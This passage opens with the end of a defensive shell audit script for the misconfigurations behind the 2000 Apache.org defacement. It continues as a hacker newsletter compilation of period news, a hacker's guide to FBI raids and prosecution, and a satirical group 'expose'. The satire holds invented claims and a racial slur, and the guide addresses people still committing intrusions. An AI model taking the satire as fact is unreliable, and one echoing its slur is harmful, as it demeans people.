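    webroot=$1; ftproot=$2; findings=0

    ww=$(world_writable_dirs "$webroot" || true)
    if [ -n "$ww" ]; then
        echo "[!] world-writable directories under $webroot:"
        echo "$ww" | sed 's/^/      /'
        findings=$((findings + 1))
    fi

    rc=0
    roots_overlap "$ftproot" "$webroot" || rc=$?
    case $rc in
        0) echo "[!] FTP root $ftproot overlaps web root $webroot"
           findings=$((findings + 1)) ;;
        2) echo "[?] could not resolve $ftproot or $webroot" ;;
    esac

    asroot=$(ps -A -o user= -o comm= | root_owned mysqld || true)
    if [ -n "$asroot" ]; then
        echo "[!] running as root: $asroot"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ] && echo "[ok] none of the three faults found"
    return "$findings"
}

# Only run when both paths are given, so the file can also be sourced.
if [ "$#" -eq 2 ]; then
    audit "$1" "$2"
fi
```

The overlap check compares physical paths, so a symlink from the FTP tree into the web tree is reported as well.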
C|Net;
http://news.cnet.com/news/0-1003-200-1821155.html?tag=st.ne.1002.bgif.ni
Apache site defaced in "embarrassing" hacker attack
By Stephen Shankland
Staff Writer, CNET News.com
May 5, 2000, 12:45 p.m. PT
Intruders defaced the main Web site of the Apache Web server project this
week with a fake ad for a rival software package from Microsoft.
A group of intruders broke into the server by exploiting a series of
weaknesses, said Rasmus Lerdorf, a member of the Apache Software Foundation
board of directors and a programmer at Linuxcare. The intruders limited
themselves to inserting the Microsoft advertisement at the bottom of the
page, though they could have done much worse damage because they had gained
complete control over the computer, he said.
Because of the comparatively mild damage and the fact that the intruders
told Apache how their attack worked, Apache termed them "white
hats"--helpful hackers, not the more malicious "black hat" category.
"They seemed friendly," Lerdorf said. "It would have been nice if they
hadn't put the damned Microsoft logo up, but I guess they had to do
something to get attention."
The burgeoning number of computers on the Internet is vastly increasing the
opportunity for attackers looking for sites to break into. At the same
time, those computers also are storing more important information, such as
credit card numbers or corporate records.
Apache is software used on a server to deliver Web pages to Internet
browsers. It's the most commonly used Web server software, running on 60
percent of Web servers, according to a study by Netcraft. Microsoft's
Internet Information Server is in second place with 21 percent.
Apache, along with Linux, is among the best-known "open-source" programming
projects, in which anyone may see, modify and redistribute the software's
original programming instructions. Open-source projects typically are
developed by a core group of volunteers, but corporations are increasingly
involved as well. IBM and Sun Microsystems in particular have boosted
Apache.
The basic problem at Apache was that too many people could install whatever
software they wanted on the server, leading to vulnerabilities that stemmed
from the different pieces of software interacting, Lerdorf said. "We just
had too many people installing too many services on the box without
coordinating with each other," Lerdorf said.
Apache now has shut down two vulnerabilities that led to the attack and has
reduced the number of people who have control privileges, he said. In the
longer term, Apache will be splitting jobs across several servers, a
configuration that allows better security, Lerdorf said.
In a note posted to the Bugtraq security mailing list today, the intruders
described how they broke into the server.
Lerdorf said the first stage was that members of the public could store
software on the server after sending it with FTP software. The attackers
used this feature to save a small program on the machine that later could
be used to tell them what files were stored elsewhere on the system.
The intruders then discovered the server had the Bugzilla bug-tracking
software produced by Mozilla, the organization building America Online's
Netscape Web browser. A weakness in Bugzilla allowed the attackers to gain
complete control over the system, Lerdorf said.
Apache shut down Bugzilla completely and will either fix it or replace it
with other software, he said.
Lerdorf put a good face on the defacement. "We can only blame ourselves,"
Lerdorf said. "It's quite embarrassing, but it's a good little heads-up."
SlashDot;
Posted by jimjag on Thursday May 04, @11:23AM
from the strong-as-the-weakest-link dept.
Yesterday, due to system-level misconfigurations, www.apache.org was
defaced after a root-level breakin. Those responsible for finding the
holes and the ASF have been in cordial contact, and the holes have been
plugged. In the process of doing that, FTP and other services on
www.apache.org have been stopped. A mirror of the defaced site can be
found on the Attrition.org mirror site. Brian Behlendorf sent the
following to various Apache mailing lists:
Hi. We have been made aware (thanks to a very humorous banner ad for
Microsoft Back Office on the front of www.apache.org!) that our particular
configuration on www.apache.org of ftpd and bugzilla opened a security
hole that allowed someone from the outside to get a shell account, and
then get root. We have been in contact with those who found the hole, and
have closed up the misconfigurations that allowed this.
It is important to note that this is *not* a hole in the Apache web server
or related software products. I would encourage double-checking the PGP
signatures of Apache releases for the immediate future.
However, I do not believe we are out of the woods yet. Bugzilla has not
been thoroughly audited, and while I am not worried about ftpd, simply
having another daemon that can write files to the web server whose purpose
has been completely superseded by others suggests that taking it down for
good is the right idea.
So I am taking down FTP - something that should have been done long ago.
If there are FTP links on any of our pages (or on places like freshmeat)
they should be changed to HTTP. There are enough high-quality text-mode
HTTP clients that there is no point to having it up, save for mirroring,
and we allow rsync and cvsup for that. I will be contacting the mirror
site admins list to communicate this.
Also, I have taken down all installations of bugzilla on apache.org until
it can be audited. I will be performing a first pass tonight over it, but
anyone else familiar with perl and willing to deal with rather ugly code
is welcome to do so as well. I will set it back up once I'm comfortable
there's been at least one reasonable pass over the whole codebase and any
obvious holes have been plugged. This is only life-support though; I
really don't think we should be using bugzilla once a suitable replacement
is found.
Finally, I think it can be said that this compromise was mostly due to a
lack of discipline on the part of those who had root and set up services
without considering the ramifications of the way they were installed. I
don't want to point fingers, since I'm probably at least as to blame as
others, but I do feel that the policy of giving root access to a larger
number of people than usual was probably a mistake. Along those lines,
I've changed the root password and removed everyone from group wheel but
myself - sorry to be fascist about this but I kinda feel like at the end
of the day it's my responsibility. We'll come up with a strategy soon
about granting sudo access to particular people for particular binaries so
that I don't become a bottleneck again.
The details will soon be posted to bugtraq. Thanks.
LinuxNews.com
Pow-Wow With Apache's Hackers
By Michelle Head
Can you be scalped nicely? Apache seems to think being red in the face
beats being red in the accounting department after an embarrassing
encounter with some clever and well-meaning hackers.
With the IT world still bobbing confusedly in the wake of the Microsoft
Outlook love bug, the Open Source Internet Servicer, which currently
runs over 60% of the Web sites on the Internet, was targeted by hackers
Friday. The intruders, who declined to damage or disrupt the site,
instead marked their trail with a modified Microsoft logo.
Shortly afterwards, the hackers described their harmless heads-up in
full detail on the Internet in a step-by-step tutorial, identifying
themselves as Hardbeat and {}. The site describes how configuration
errors allowed the two access to Apache--and how, instead of damaging
the site, they simply posted an amusing warning and secured the site
from other, less well-meaning prowlers on their way out.
Asked if this hack was meant to protect a major Open Source project,
Hardbeat responded, "We did this hack because we could. The possible
risks mentioned in the paper (Trojanning Apache source) were really an
afterthought. We did this because Apache.org is a high-profile site, and
these configuration problems are common. Therefore, defacing Apache.org
would be a great way to draw attention to these errors."
{} described his background. "I am a coder, everything I write (like a
Linux kernel security patch named auditfile) is Open Source," {}
volunteered. "I work at a local monkey zoo and at a Cable ISP." {}
intends to start formal training in computers next year.
Hardbeat's background in Open Source is less extensive. "I have written
one Open Source tool (http://www.dataloss.net/midentd). It's [available
under the GNU (GNU's Not UNIX) General Public License (GPL)] but the
next version will not be. It is also no longer maintained, because I am
too busy. In daily life, I go to University (I am in my first year of
Computer Science) and I have a job as a systems administrator/developer
at a big hosting company in The Netherlands. I have no professional
training," Hardbeat explained. "It's all experience."
Hardbeat commented on the hackers' choice of a Microsoft logo for their
marker. "Let's start by stating that that had no political meaning--we
were looking for a subtle way to show we had that kind of access,
without damaging anything or hindering people in their business at
www.apache.org," he wrote.
"We also figured that would draw a teensy little bit of extra
attention," he continued, "and you asking this question shows that it
does. :) Also note that this was not an official M$ logo," he added. "A
friend of ours who works as a graphic designer did this thing for us."
On whether Apache is their first (or last) mission, the happy hackers
have no comment. "If we have anything to share we will, but privacy is a
high good," Hardbeat explained.
Hardbeat and {} hoped Apache would have "the only correct reaction to
such a hack--to talk to the people who did it, and not sue them when
they had no bad intentions." The pair hoped to educate Apache rather
than upset them.
"Talk to them, ask them what they did and especially how they did it,"
Hardbeat advised. "That way they will stay friendly to you and help you
fix the problems in a quick and reliable way."
"Apache reacted above these hopes, being friendly and responsive,
complimenting us `you guys are clever!', `Good work, guys'" Hardbeat
reported.
Apparently Apache's director was grateful for the warning. "They seemed
friendly. It would have been nice if they hadn't put the damned
Microsoft logo up, but I guess they had to do something to get
attention," Apache Software Foundation director Rasmus Lerdorf said in
an interview with CNET. "We can only blame ourselves.
"It's quite embarrassing, but it's a good little heads-up,"
About the Author:
Michelle Head is an experienced author who decided to plunge into the
world of Linux journalism. Michelle is a new Linux enthusiast and is
excited about the Linux community. She welcomes feedback on her articles
and would love to hear ideas for future articles. She can be reached at
Michellh@LinuxMall.com.
@HWA
32.0 [IND] The Goat Files: mindphasr talks more about his bust.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(selected files from www.goat-security.org)
http://www.goat-advisory.org/texts/goat-gH-busted.txt
"Everything a hacker needs to know about getting busted"
part 2 by mindphasr (gH)
***note: Although g0at security mocks gH quite a bit, we still have somewhat
good relations with the busted mindphasr. I asked mindphasr to write something
like this for goat-advisory.org, instead it is being released under gH, we do
however have exclusive distro rights to this, thus the reason why it is up here....
..::gH Release 040900:..
..::mindphasr@attrition.org:..
* Converted from a scratch pad into a .txt file by John Welder a.k.a. "Ansle"
"EVERYTHING A HACKER NEEDS TO KNOW ABOUT GETTING BUSTED PART 2"
:PREFACE:
A. INTRODUCTION
B. THE RAID
C. CHARGES
D. GETTING A DEFENSE
E. INDICTMENT
F. PLEA AGREEMENTS
G. HEADING TO COURT
H. YOUR FUTURE
I. THE END
:PREFACE:
This file is being written for the sole purpose to be informative. I take no
responsibility for anything that is done with this file in mind. This file may be freely
copied to bulletin board systems, text archives or print material. All I ask is proper
credits are given to the author(s). - mindphasr / April 5th 2000
A. INTRODUCTION
Nowadays, after very popular movies such as "Hackers" and "The Matrix" the hacker world has
much been glamorized as something most people will see as something very
interesting. However, what is not shown is the real consequences of what could happen in
the end. There have been so-called hacker groups popping up all over, many of which last
about as long as a 10 dollar bill laying on the road. In the past 5 years I have gone
through many things in the scene. I have seen people trusted by the community turn into
FBI informants, I have seen looked up to people in the scene turn into FBI informants, I
have also seen best friends turn their backs. This is all part of the so-called hacker
world. Many individuals these days will do anything they can to gain respect in the scene,
however many are unaware what may come of this. I have been through one of the most highly
publicized hacker incidents in the last decade, and unfortunately have also gone through
the court battles. The battles I hope this document will help most get through. However,
this document will be focused primarily on the legal issues involved and what to and to not
do. I write this with much respect for Agent Steal's 1997 file "Everything a hacker needs
to know about getting busted". I am going to go over some things that have not been covered
in his file. It is an excellent file, read it, read it many times. You may obtain his
text file at http://www.attrition.org/~modify/texts/scene/everything.busted.html . Enjoy.
B. THE RAID
This is probably when it will hit home for most of you. You may suddenly realize what you
have done is not so harmless. You will most likely be awakened from a sleep between
6am-9am. You will get to hear the infamous FBI knock. They knock louder than anyone you
have ever heard, you will know it's them. If you do not open the door within a minute or so
they will not hesitate to open the door themselves. If you are in an apartment complex,
they will have a key. If you are at your home, they will have a bigger key that will knock
your door down. It will usually be a few FBI agents and then local law enforcement
'assisting'. They don't care if you're a 9 year old or a 40 year old. They do it all
the same. When they come in they will find you and grab you and drag you somewhere safe
where they can search you. In most cases that will be outside your apartment or
house. They will have their guns drawn, so doing something stupid at this point would not
be bright at all. They will then handcuff you and bring you back inside and set you down
on a couch or a nice chair. Get comfortable you may be sitting there awhile. An agent
will then proceed to tell you they are going to search your place, make sure you ask for the
search warrant. A key to look for here is who the warrant is written out to. In most cases
your local police will NOT have a warrant issued to them, do not let them go through
your stuff. Leave it to the FBI. There is actually a good reason for this, the FBI will
not and cannot issue citations for drugs, underage drinking, etc. If the police see it
they will write you up. You don't need that. They like to get sneaky and try to get you to
agree and make you think they have one. They will NOT always have one. After you overlook
the warrant, they will then proceed to tear your place apart. They will search everything,
I mean everything. In fire alarms, behind posters, in attic, under rugs, in refrigerator,
in tape decks, in your garbage. While the agents are executing the search one designated
agent will be there to try and get you to talk to them. You have heard it before and you
will hear it again many times: DO NOT SPEAK WITH ANY OF THEM, KEEP YOUR MOUTH SHUT! NOTHING
YOU SAY WILL DO YOU ANY GOOD. When you decide not to speak with them chances are they will
get a little testy. That's their problem. I suggest you do not say a single word while
they are there other than "May I see the warrant?" You don't have to; it's your right to
remain silent. In most cases they will not arrest you. They will leave. They will also
try and say bye to you and get you to call them back. This is a controversial situation,
some people say call them back and try to cooperate. However, in my experiences it gets
you nowhere. So don't bother. Before they leave, make sure you get a copy of the search
warrant and the "Search & Seizure" form. That form will allow you to get your things
back. If it is not written down on there, you will not receive them back. Check it over
before they leave.
C. CHARGES
In most cases after the raid you will not hear from the FBI for quite some time. Some
cases, never again. They tend to take their time. Charges will follow. They will be back
to execute yet another search warrant, however most cases this will have to be a voluntary
execution. They will most likely be back with a list of charges being brought
forward. They will then ask you if they can execute a search warrant. If you say no they
will say a cocky line such as "Oh, that doesn't matter we can get one within 1 hour, and we
will let the judge know you're not cooperating." This is the point where you may want to
cooperate somewhat. They can keep you in custody. They will arrest you and bring you in
front of the nearest Magistrate (which is a fancy term for an off-duty judge). He will then
decide whether you should be kept in custody or not. In my case, I was brought downtown to
the courthouse and put in a real nice office and put on a teleconference with a Magistrate
and he discussed with the FBI agents if I should be kept in custody or not, and if not what
my conditions of release should be. This is where the agents may say you are not
cooperating. I was released on a signature bond and restricted from coming within 10 feet
of a computer.
D. GETTING A DEFENSE
Depending on your case, you are going to have to decide what kind of lawyer to get. In
federal cases there really is no such thing as "Public Defender". What they do is put
together a bunch of lawyers who would like to work federal cases to extend their
resumes. They then pick from a "hat" to come up with a lawyer to represent you. In my
case, I was hooked up with a very very nice lawyer. So therefore I did not have to go out
and spend my life savings on legal fees. However, you could get the so-called shaft and
get a sucky PD wannabe. In this case you are going to want to go searching for a lawyer
who has experience in this sort of law. Those kinds are becoming easier and easier to find
these days. Depending on your wallet you are going to want to find one you can afford and
yet still be able to eat afterwards.
E. INDICTMENT
This is sort of a downtime. You must wait for the Grand Jury to come back with an
indictment on your charges. This will happen 99% of the time. This is when the charges
are official. Most indictments will have extra charges tacked on that the government
themselves know they cannot prove. These will be used for "Plea Bargain" situations. Such
as "You plea to count 1 and 3, we will drop 2 and 4" You get the idea.
F. EVIDENCE
Be prepared, you are going to be surprised at what the government has on you, and your
'conspirators.' You are going to want to file a "Motion for Discovery" which will require
the government to hand over all their "discovery" materials. This will include photocopies
of paperwork obtained at their raids, stuff from others. Statements made by others against
you. And of course hardware. You get the point. The government will go over this very
closely and pick apart everything. They like to link everything together, even if it's not
called for. They will do it. They will most likely go through your drives and link
together things to make you look like a monster. They will also pin you down as part of a
conspiracy if you are involved with more than one person, such as in my case. If you are
lucky they won't file additional conspiracy charges.
G. HEADING TO COURT
Once the indictment is presented, you have to make some very important
decisions. These could affect your future. First off, are you clearly guilty of the items
and can they be proven? If so, common sense tells you not to spend your life fortune to
hire a lawyer who will lie for you. In most computer cases there is substantial evidence
that is rather blatant. Such as phone logs that will show exactly what you did. If you
believe you are being targeted for things that cannot be proven. Go ahead fight it. In
most cases the government will try to tack on a few extra charges, which are rather
irrelevant and they know cannot be proven. However, these are used for plea bargain
situations. I will discuss that a bit more in the next section. So far, in this file I
have taken a much better look at Federal crimes. Since unfortunately that is all I have
personal experience in. In federal cases all court dates will be one of the Federal
Courthouses. You most likely will have to drive a ways to get to it. Each state has at
least two federal courthouses. This will vary depending on where you are.
F. PLEA AGREEMENTS
They will be offered. Sometimes they will be bad, sometimes they will be good. Do NOT
take the first one presented to you. This is usually an agreement, which lets the
government know how guilty you really think you are. They will offer more than one. If
you have a good lawyer he will be in contact with the US Attorney and will try to work
something more practical out. It happens in most cases. This is a very important thing to
think about. If you do not accept a plea agreement, then you can risk your case in
court. However if you lose, you may be wishing you had accepted an agreement. You can't
go back and accept it later. Think about this, think about this long and hard. If you
decide to accept one, make sure you read the WHOLE agreement over, several times. They
like to hide things in there. Be careful of what you sign.
G. SENTENCING
Let's skip ahead here. Let's say you are found guilty of something. Then the next phase is
sentencing. This can be a wreck to most people and their families. Sentencings in federal
cases go by the United States Sentencing Guidelines aka U.S.S.G. It is a point scale. They
will take your criminal history, your cooperation, the damage caused, i.e. and add points
up and minus points off. They will come up with a number. This number will decide the
sentencing range. In my case there was quite a problem with this. My lawyers added up a
number of 8. The government had a number of 9. Because of the disagreement on damage
caused. The 1-point difference was about 5 months different in imprisonment. The judge
has the discretion to not use the point system. However, my case was sort of a precedent
being set. If the points were 8, I would have gotten 0-6 months. However, the minimum
sentence in the code for the sub Section 1030 crime was 6 months. So that caused a
problem. Could the judge go less than 6? He clearly could according to the U.S.S.G. but
not according to the law. He elected to rule out the points, and go with the book. I was
given 6 months. The very minimum. Even though the government was looking for 28 months
:) The judge may also decide where to put you. In my case I was sentenced to a Federal
Half-Way house. I was lucky, there was room and I did not have to spend any time in a
Federal Prison. I have not been to the halfway house yet however, so I will leave
information on that to be put in a revision down the road.
H. YOUR FUTURE
Now, after your stint in the Federal holding center. You will most likely be not allowed
to speak with any of your ex-friends. Not use a computer. Let all employers know of your
past. Be on probation. Not be allowed to profit from your story. All these things come
as part of your sentence. You will have to report to a probation office, be drug
tested. Have to contact her of any police contacts, if you are leaving your district. It
will not be fun. I got the maximum probation, which is 3 years for my case. I will deal
with it. If I can I'm sure you can :)
I. THE END
Well, I hope this was a help to you. This along with Agent Steal's text I am sure you can
get a very good understanding of the whole situation. I am not here to tell what to and
not to do. Remember, I have gone through it. I know how it is. If you are going to do
these activities please remember these things. As long as you talk to the right people
(Stay away from John Vransevich @ AntiOnline, Carolyn Meinel @ HappyHacker) and be very
careful when you do things. Slipping up once, may make these text files reality.
I admire and respect the following people and organizations very much for their friendship
and help over the past 5 years, you have been a big part of my life whether you know it or
not:
Organizations: Global Hell(gH), cha0s inc., Cult of the Dead Cow, h4gis, l0pht, Attrition,
Hacker News Network, Pure Security Networks, Help Net Security, 100% Bikkel(RIP), Defcon,
Rootfest, 2600-gb2600, FinalDream inc.,
Individuals: MostHateD, altomo, Zyklon, Taylor, shekk, Debris, ech0, Jericho, McIntyre,
flesh, obsolete, LoopHole, aeonflux, SoulBlaze, Rewn, Kuruption, Cryzydopey, diesl0w,
socked, spacerog, Agent Steal, Kevin Mitnick, Ted Bridis, Brock Meeks.
@HWA
33.0 [IND] The Goat Files: "Hackers unite - a goat security expose"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(selected files from www.goat-security.org)
04/24/00
///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
[g0at] http://www.goat-advisory.org [g0at]
-=g0at media productions=-
((Hackers unite))-((A goat security expose))
In a most terrifying move by the biggest names in the underground community,
representatives of Global Hell (gH), the Shot Down Crew (sDc) and
the Brotherhood of Warez (BoW) have announced a merger making them the biggest and
most powerful hacker group the Eris Free net's IRC network has ever seen.
g0at security [http://www.goat-advisory.org] has taken upon itself the mission of
getting to the bottom of this alarming event and discovering the reasoning behind it.
Recently, a member of g0at security visited Global Hell leader, Patrick Gregory
(aka Mosthated) in his new home, a United States federal penitentiary where he is
serving 5 years. Upon entering the prison library, where we were to interview Gregory,
we found him sitting on the lap of another inmate tapping away at the keyboard of the
prison computer. When asked what he was working on, Gregory replied saying that he had
recently reformatted the computer and installed the latest version of Linux Mandrake as
opposed to Microsoft Windows 95 since microsoft products are lame. He then went on to
tell us that to occupy time in prison, he has downloaded Microsoft Visual Basic 6 and
has been running it with the latest version of Wine in the KDE environment. A full interview
follows.
GS - g0at security
MH - Patrick Gregory
GS: Can you confirm a merger between Global Hell and other well known underground groups?
MH: Yes, Global Hell is merging with two other groups.
GS: What groups are these?
MH: The Shot Down Crew and the Brotherhood of Warez.
GS: What is the reasoning behind this merger?
MH: Well as you may know, since the FBI investigation commenced in the Summer of 1999,
gH has slowly been dying out. Many of our members have taken off in fear of being
raided, some were arrested, and gH's two leaders are now serving time. We have lost
our stronghold on the internet and we must regain this in order to show the public
stability in our organization.
GS: Why is stability in Global Hell required for the general public to see?
MH: The gH ran security site (http://www.pure-security.net) has been growing
gradually over the past half year and we need to raise some capital in
order to increase our expansion. Pure Security Networks, is announcing that
it has filed to go public (IPO) in May of 2000.
GS: An IPO? Please expand on this...
MH: Well, May 23 2000, Pure Security Networks under the symbol of PSN, will be trading
on the Nikkei 225. Common shares will start at $0.32, no preferred shares are
being offered.
GS: During this expansion of Pure Security Networks, what new services will be offered?
MH: Well we have negotiated a contract with the government of Zaire to offer internet
connectivity to local schools. Also we plan on beginning mutual fund and retirement
consultations along with helping script kiddies create investment portfolios.
g0at security then went on to get the Smack Down Crew's side of the story. g0at security
found members of the group on the James Joyce appreciation BBS located in Dublin, Ireland.
When asked about the merger and various questions related to the IPO, sDc representatives
responded with the same uniform answer, "Whachoo talkin bout foo". They then went on ranting
about how they own goats. They ended the interview with a very befuddled quote. "Dem goats
better rememba somethin foo, mess with the best, die like the rest". We were then expelled
and banished for life from using the James Joyce appreciation BBS.
Finally, g0at security went on to get the story from the Brotherhood of Warez. g0at security
met with a member of the group, sw_r on a popular IRC channel, #solace on efnet which
appeared to have been taken over by some goats. When asked about the reasoning behind
the merger and IPO, he went on to quote us this:
"Back in the day, I was a member of the MOST elite hacker group ever, the Masters of Deception.
MOD was so much more elite than LOD. FUCK the LOD, they should all rot in hell. God I hate
Eric Bloodaxe, that neegro is going to get it. Friggin hick, show them texas boys what I'm made
of. Anyways, a book was written about the MOD and how we kicked the LOD's asses! Those stupid
authors (Michele Slatalla and Joshua Quittner) didn't include me in their friggin book! They
should DIE! I own them. I own them all. So with this IPO, I hope to buy out the Harperperennial
Library and ruin those damned authors' careers. I'll show them who the elite one is. Not
that twerp PhiberOptik, I own his ass. I'll school him in DNS anyday".
g0at representatives then proceeded to back away very slowly until there was enough distance
for us to run away, fast, very fast.
Call your brokers folks, this hot new IPO is expected to rise, fast, very fast. In final notes,
this new group being dubbed, the Planet Hackers Club should not be messed with. Already they have
waged war with other groups such as DevilSoul and the Pakistan Hackers club. Routers everywhere
are in major trouble. We hoped this expose was helpful and informative and all further questions
should be directed to members of this new merged group.
@HWA
34.0 [MM] Napster boots 317,377 users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"So, what the heck is Napster?
Napster is a completely new way of thinking about music online.
Imagine...an application that takes the hassle out of searching for MP3s.
No more broken links, no more slow downloads, and no more busy, disorganized
FTP sites. With Napster, you can locate and download your favorite music in
MP3 format from one convenient, easy-to-use interface."
- From the Napster site.
ZDNet news;
http://www.zdnet.com/zdnn/stories/news/0,4586,2566773,00.html
Napster boots 317,377 users
Earlier this month, Metallica presented Napster with a list of users who it
claimed had violated the band's copyrights.
By Margaret Kane, ZDNet News
UPDATED May 10, 2000 9:58 AM PT
Online music vendor Napster Inc. said it has removed 317,377 users who have
been accused of violating copyrights off its Web site.
The action was taken in response to a request from heavy metal band
Metallica, which filed suit against Napster in April. Last week Metallica
presented Napster with a list of users who it claimed had violated the
band's copyrights.
The band provided Napster with a list of user names; file names of
allegedly infringed music for each user; and the time, date and IP address
of the Napster server to which the user was connected. The list did not
contain IP addresses of the users.
Rapper Dr. Dre announced Wednesday he will submit names to Napster for
removal from the system, according to attorney Howard King, who also
represents Metallica.
Napster's technology allows users to copy digital music files from one
another.
"We intend to fully comply with the DMCA (Digital Millennium Copyright
Act) and our policies," reads a statement posted on the Napster site. "We
will take down all users Metallica has alleged, under penalty of perjury,
to be infringing."
The company said users who feel they have been banned by mistake will be
given the opportunity to submit a "counter notification" form.
Metallica obtained the users' IDs by monitoring the service over a two-day
period. Napster said it did not give Metallica personal information, such
as names and addresses, about the users who have been kicked off.
Metallica's attorney said last month that the band submitted the names at
Napster's request.
Dr. Dre also filed suit against Napster last month.
The ban will only extend to users who shared versions of commercially
released songs and would not apply to "bootleg" recordings made at
concerts.
Marilynn Wheeler, ZDNet News, contributed to this report.
Napster's Press Release:
~~~~~~~~~~~~~~~~~~~~~~~
http://www.napster.com/metallica-notice.html
Information About Metallica's Request To Disable Napster Users
On Wednesday, May 3, 2000, Napster received a delivery from the band
Metallica of 13 boxes of paper notifying us of Napster users alleged to be
infringing Metallica and its related entities' copyrights. On Thursday
afternoon, May 4, Metallica sent computerized lists of 317,377 Napster
user names alleged to be infringing Metallica's copyrights. Metallica has
requested that, in compliance with the notice and takedown policies
outlined in the Digital Millennium Copyright Act ("DMCA"), Napster act
expeditiously to disable all of these users.
We intend to fully comply with the DMCA and our policies. We will take
down all users Metallica has alleged, under penalty of perjury, to be
infringing.
Conversely, the DMCA affords certain protections to users. Namely, a user
who is banned from the service deserves the opportunity for reinstatement
in the event that there has been a genuine mistake or misidentification of
the materials made available by that user. Users who feel they have been
banned as a result of a mistake or misidentification of content may submit
a "counter notification" form.
The Napster software will direct all users barred as a result of
Metallica's allegations to an infringement notification page. That page
explains the notice that Metallica has given us, explains who Metallica
has stated to us it intends to block, and gives the user an opportunity to
submit a counter notification if the user has been misidentified. If the
user has been misidentified, and requests to be reinstated by submitting a
counter notification under penalty of perjury, then, unless Metallica
chooses to pursue legal action against that user within 10 working days of
being notified of that user's counter notification, the user is entitled
to be reinstated.
We at Napster respect the privacy rights of our users. We currently keep
our users' personal information, including personal names, e-mail
addresses, street address, or other data separate and distinct from users'
Internet activities. That information was not disclosed to Metallica, or
to its related business entities Creeping Death Music, or E/M ventures, or
any other entity. Napster collects information at registration solely for
the purpose of better understanding who its audience is. Of course, if you
subsequently send Napster e-mails, other correspondence, or a "counter
notification" that identifies both your user name and your real name or
e-mail address, that information does become recorded in combination.
Because of the methods employed by Metallica in assembling its list of
usernames, it is possible that users have been mistakenly implicated as
infringing the copyrights of songs and recordings originally included on
commercially released Metallica albums. It is also possible that Metallica
has correctly identified many users. Napster will reinstate those users
who dispute Metallica's allegation of infringement via a sworn "counter
notification" stating that they have not shared the materials to which
Metallica objects, and who, after submitting the counter notification, are
not made the subject of legal action by Metallica within ten (10) working
days after Metallica is notified of that person's identity.
Frequently Asked Questions About Metallica's Request (FAQs)
Q: What information has Napster received from Metallica?
A: Metallica delivered a computerized list of 317,377 distinct usernames
to be banned from Napster. The list contained usernames, filenames of
allegedly infringing music for each user, time, date, and the IP address
of the Napster server to which the user was connected. That information
did not contain the user's IP address or personal information. Metallica
has stated that it intends to limit the scope of its notification to
commercially released Metallica albums, making "no claim of infringement
with respect to recordings of songs made by fans at Metallica live
concerts."
Q: How has Napster responded to this request?
A: As a DMCA compliant service, Napster feels strongly that it is
important to expeditiously remove users alleged with copyright
infringement. Napster has blocked all users identified by Metallica
as allegedly infringing, based on Metallica's sworn allegations against
these usernames. If, but only if, these users feel that they have been
identified in error, they have recourse through our counter notification
policy.
Q: Has Metallica requested any personal information related to Napster's
users?
A: No, and no such information has been provided to them.
Q: What does Napster do with personal information provided at
registration?
A: Napster archives personal information, such as user addresses,
e-mail addresses, and the like, to use as general demographic
information for audience measurement purposes. We do not currently
associate a user's personal information with their Napster username.
Copyright 1999-2000 Napster, Inc. All rights reserved.
@HWA
35.0 [MM] ytcracker busted for web defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.gazette.com/daily/top3.html
Teen accused of raiding city Web site
By Danielle Nieves/The Gazette
Edited by Mike Braham; headline by Gary Houy
A 17-year-old Colorado Springs boy
was charged in juvenile court
Tuesday with one count each of
computer crime and criminal mischief
after he broke into the city's Web
site in October and replaced it with
the message, "i love this city
ytcracker 9d9 palmer high."
The two felony charges carry a maximum penalty of two
years of juvenile detention.
The boy, known online as "ytcracker," said he is a
benevolent hacker who was trying to alert officials of
potential security glitches.
After discovering he had tapped into the city's Web site
in October, Colorado Springs police began an
investigation and said he had tampered with at least 40
other Web sites, including Airspace USA, Altamira
International Bank, Nissan, Honda, the U.S. Geological
Survey Monitoring Station and the Texas Department of
Public Safety.
In December, not knowing of the investigation,
"ytcracker" contacted the National Aeronautics and
Space Administration and told them he had meddled
with their Web site.
The agency teamed with Springs police, the Defense
Criminal Investigative Service, the NASA computer crime
division and the Texas Department of Public Safety to
gather information that led to the felony charges.
"I never had any intentions of doing damage," he said.
"At first it was funny, and then I wanted to alert people
to the security vulnerabilities in everyday software - and
the fact that no one is immune."
The boy said what began as a joke last summer turned
into a precarious game between administrators of online
Web sites and his own expertise. He said he started
hacking into local business sites, then graduated into
more complicated systems, like the Bureau of Land
Management National Training Center.
The Web sites he affected were typically dismantled for
only a matter of hours, he said. Police said he caused
$25,000 damage, a figure based on the costs of
installing secure sites and the time lost to users while
the software was repaired.
The teen, who dropped out of school because he was
"too bored," is a self-taught computer whiz who said he
started using a computer when he was 2 years old.
"I understand what I did was wrong," he said. "I'm
hoping something good will come out of it."
@HWA
36.0 [HNN] Junger wins in Appeals Court-Code Declared Speech
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
Junger wins in Appeals Court - Code Declared Speech
contributed by Dan
The 6th Circuit Appeals Court has overturned a lower court ruling and
has concluded that the First Amendment does in fact protect computer
source code. Therefore they have remanded Peter Junger's case over
encryption exports back to the District Court for further
consideration.
6th Circuit Court Opinion
Associated Press - via World News
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION
http://www.worldnews.com/?action
BAD URL - expired or deleted. - Ed
@HWA
37.0 [HNN] Bullet to Scan Hard Drives of Web Site Visitors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by acopalyse
Code-named Bullet and developed by ISS, this new software lets
e-commerce companies scan a Web site visitor's hard drive to see if it
is infected with Trojan horses, viruses or other malicious software
that could be passed on to the e-commerce site. Few details about the
program are available, the release date and pricing has not yet been
announced. (Are companies going to warn users before they scan them?)
CNN
http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html
Frisking computers at the door
April 6, 2000
